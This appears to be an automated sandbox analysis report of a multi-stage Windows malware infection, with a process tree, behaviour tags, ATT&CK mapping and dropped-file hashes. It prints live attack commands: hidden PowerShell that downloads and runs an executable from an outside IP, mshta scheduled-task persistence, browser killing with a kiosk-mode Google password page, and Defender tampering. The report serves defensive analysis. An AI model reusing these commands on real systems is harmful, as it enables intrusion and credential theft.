C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"5⤵
- Executes dropped EXE
PID:2508 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2508 -s 366⤵
- Loads dropped DLL
PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030290101\7db14a892a.exe"C:\Users\Admin\AppData\Local\Temp\10030290101\7db14a892a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3628 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030300101\7a4262cb0d.exe"C:\Users\Admin\AppData\Local\Temp\10030300101\7a4262cb0d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3848 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1164
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit4⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235690101\36fe0958ef.exe"C:\Users\Admin\AppData\Local\Temp\10235690101\36fe0958ef.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn iqOvPmaHPMP /tr "mshta C:\Users\Admin\AppData\Local\Temp\wtCb5GToV.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn iqOvPmaHPMP /tr "mshta C:\Users\Admin\AppData\Local\Temp\wtCb5GToV.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2036
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\wtCb5GToV.hta4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Users\Admin\AppData\Local\TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE"C:\Users\Admin\AppData\Local\TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2576
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10235700121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:1240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "mjLoCmaCSaZ" /tr "mshta \"C:\Temp\VlYw6hvKU.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1564
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\VlYw6hvKU.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235930101\970d7d5d87.exe"C:\Users\Admin\AppData\Local\Temp\10235930101\970d7d5d87.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 12404⤵
- Loads dropped DLL
- Program crash
PID:2484
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235950101\2be00504eb.exe"C:\Users\Admin\AppData\Local\Temp\10235950101\2be00504eb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\10235960101\bbc9d61153.exe"C:\Users\Admin\AppData\Local\Temp\10235960101\bbc9d61153.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2372 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1616
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2864 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.0.1309317612\2108020645" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 21005 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a17c54b0-a878-4a98-b9a9-82626d9076e4} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 1300 f7f5058 gpu6⤵PID:2944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.1.1852479188\288482675" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21866 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dccd414-bd02-4b62-ab2f-3ce0fb0f9d0f} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 1504 d71b58 socket6⤵PID:2868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.2.39854183\1902487651" -childID 1 -isForBrowser -prefsHandle 1084 -prefMapHandle 1080 -prefsLen 21904 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {447cf66d-8c27-4fe6-ba78-307588f67ec9} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 2100 1a4c2f58 tab6⤵PID:3064
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.3.414991043\387812536" -childID 2 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 26374 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90fc7fcc-4ffd-454a-973c-4aa8eb906e98} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 2904 d64858 tab6⤵PID:2844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.4.2052196422\1959393719" -childID 3 -isForBrowser -prefsHandle 3824 -prefMapHandle 3820 -prefsLen 26509 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e8236a2-b57e-4fc8-8cd7-a25f73928ea7} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 3836 1ee95158 tab6⤵PID:3020
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.5.1908831669\1064270141" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26509 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9d7f621-4d1e-42e7-9b04-2f91033aa7ac} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 3936 1ee96658 tab6⤵PID:1640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.6.1825891322\1775007727" -childID 5 -isForBrowser -prefsHandle 4120 -prefMapHandle 4124 -prefsLen 26509 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {edee6415-a452-4c94-8a07-aa79d21a2fef} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 4112 209d4558 tab6⤵PID:3044
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235970101\00e7be516b.exe"C:\Users\Admin\AppData\Local\Temp\10235970101\00e7be516b.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Users\Admin\AppData\Local\Temp\10235980101\1be2e64926.exe"C:\Users\Admin\AppData\Local\Temp\10235980101\1be2e64926.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:4024
-
-
C:\Users\Admin\AppData\Local\Temp\10235990101\f96225d44f.exe"C:\Users\Admin\AppData\Local\Temp\10235990101\f96225d44f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2364 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe" & exit4⤵
- System Location Discovery: System Language Discovery
PID:3964 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236010101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10236010101\UD49QH6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\10236020101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10236020101\HmngBpR.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3600 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2364 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- System Location Discovery: System Language Discovery
PID:7072 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 2568⤵
- Program crash
PID:1504
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236030101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10236030101\zY9sqWs.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\10000910101\Bkzpa.exe"C:\Users\Admin\AppData\Local\Temp\10000910101\Bkzpa.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release6⤵
- System Location Discovery: System Language Discovery
PID:6780 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release7⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:6804
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236040101\f1f2f41f71.exe"C:\Users\Admin\AppData\Local\Temp\10236040101\f1f2f41f71.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\10236040101\f1f2f41f71.exe"C:\Users\Admin\AppData\Local\Temp\10236040101\f1f2f41f71.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3848
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236050101\1b9e525a1a.exe"C:\Users\Admin\AppData\Local\Temp\10236050101\1b9e525a1a.exe"3⤵
- Executes dropped EXE
PID:6976
-
-
C:\Users\Admin\AppData\Local\Temp\10236060101\42624cf095.exe"C:\Users\Admin\AppData\Local\Temp\10236060101\42624cf095.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 12244⤵
- Program crash
PID:3692
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
236KB
MD52ecb51ab00c5f340380ecf849291dbcf
SHA11a4dffbce2a4ce65495ed79eab42a4da3b660931
SHA256f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf
SHA512e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FN7UQQ6Z\soft[1]
Filesize569KB
MD58198efbef12eb506d8e3b7b1d0f13c0f
SHA1300e59931654ac17ccd1512a76c1d21fc8882b3f
SHA256dbcef1d924bb04367891dd29e75f2a1f3886600789f77b8207e211028db334ba
SHA512d6ef066786a573ad6d6563489e238db1c6012f6270c97cacbe2a3603e4417e61b64be7d66cd87bee6f5a2cfec46c6bb4f6d1aa8032fe8aa7142a40ebcedeeabd
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\t3xexgw3.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD5ccccd6e9a0494e2301a35a50b6591337
SHA13ebc8f4d5f48deda5c2c9accc4703abde892a400
SHA2566d07f7c6516974cb34c1c80119b8beb23828d0d927ba5f122b3a17f94c24b4db
SHA5121e66543f46b349e43ac3e1d6e0863ae2e62e0a8ffb78d8a06c2cf564fad56a68ad332747fd96f76d82b2ac2ff728fb4a549cd2554717fb5f6e1ea791d032a603
-
Filesize
57KB
MD58b85f33cf630e873c048b49dfee8496f
SHA1689fe30b45f49627cab77ec1db8b3d6f8e24f024
SHA256193dc942eb563febd96c10e8c4333ed3fe4d8c43842541c10783160285293551
SHA512e624601f13163b513cdb19725f053224e048f4d0721f624f07773bdac338daae415a54d7a48941d2bc778079a5d5307ec99cb8763f16556706db6b588fddf2e3
-
Filesize
19.4MB
MD5f70d82388840543cad588967897e5802
SHA1cd21b0b36071397032a181d770acd811fd593e6e
SHA2561be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA5123d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6
-
Filesize
445KB
MD5ab09d0db97f3518a25cd4e6290862da7
SHA19e4d882e41b0ac86be4105f8aa9b3c1526dafbe0
SHA256fc8cbb7809af3ab0b5f7ed07919bbd6c66366d1ed51681a8b91783ad8dafbb3d
SHA51246553192614fd127640fead944f6e631a30d2ebae75262b5e1ff17742ef2c50bcea229bbc74800a9f1c854369012cd1645368733f1d09e8ba8b43c7819a7314a
-
Filesize
23KB
MD51f93cc8da3ab43a6a2aa45e8aa38c0f8
SHA15a89e3c7efe0d4db670f47e471290d0b6d9fcfd5
SHA256d7f94c1a0afdd5c8a5878629b865588de4d6fa0f194021c955feb7ed9f4bd10c
SHA512cb95c12d9a2eb7d984e67669950e795d3ee090743a8db039a0389908187c78fc6ff7277f7952949001fe2f98ad5006243949bb054442808c680c6cf621e35c01
-
Filesize
362KB
MD538da35e91c9aeea07d77b7df32e30591
SHA149eebb6f1db4065b62e276f61c6f2c6abc0cb66e
SHA25653d491fcb95b0cd2c073b1a2b7dc8c032e9de2d9422ac13170fe5975b78f6a7e
SHA512739d88b2df68063eb0771cfa538bc5fdf9f3485c114c454dfa0dcce554e89cc39e3b970d689bd4c8a80ad595761a39928620cf43c05feb0aea92433870f0b8e0
-
Filesize
477KB
MD564eb4ff90db568f777d165a151b1d6ba
SHA1935f54f0dd4e5a1ba8e29759b2da3a6dd3bdf53e
SHA2561ef9b106952f822e8e5273d624233cce492171f92597bf902727a1e152be329b
SHA512aa30302784ac017cc228c52ef85dee6e9ff565163e5a14df76cc97043d75beb2057afacfcd32cf0cf55b8b7326122a0eba62562c26878edab47a67098a340f0a
-
Filesize
757KB
MD5015cea84408e2d0ea3bcb642f81f4493
SHA1ee0c0dd0d145a1e0e74154164ab5ef15494284f6
SHA2564a2686b858ce6ba244c3261ff8952e0cf4ab6b1224ef85e1ec6a2bd349656ddd
SHA512651b023f412a3dd18349eb501818ce07dc3766b190e26eabaacdcb2d9d38d50286c125a3d5eabc08af2fbd91723355c0871153ee3c86c4edb403efbb240678e6
-
Filesize
479KB
MD5145dc550875d5ffce1b981c2fe9ad4a7
SHA1861cc422292d3140899f8b09b2f7d5dc22abc13b
SHA2569434b94ac39370d5b6dee2865dcb709d02030815a40841478882c853ab1dd860
SHA512b3e957dc9b6a5d653bde2ff600687b72011bc1488c85a5aebcb1400e671326ce5aaadfb746697ad4b8f3288f192f8fe92916491d4bfcbd546415d16704e3bf65
-
Filesize
3.7MB
MD5fd209785e1bcac9f2b974c8915580885
SHA18332a50d1d2c586db4b9feb921744634e14711f5
SHA256c0182804fa347aba9dc1075718423d3eedff070f27a39612312fac1e55706a00
SHA51230fdf353e17788d26eba18c7431c87056989102453b43cf3120fb44059406fb6b9e86a7fe1bacdb965d0c4b2d884d0e87ac0ba3f4264dd7aace584cad62eaf31
-
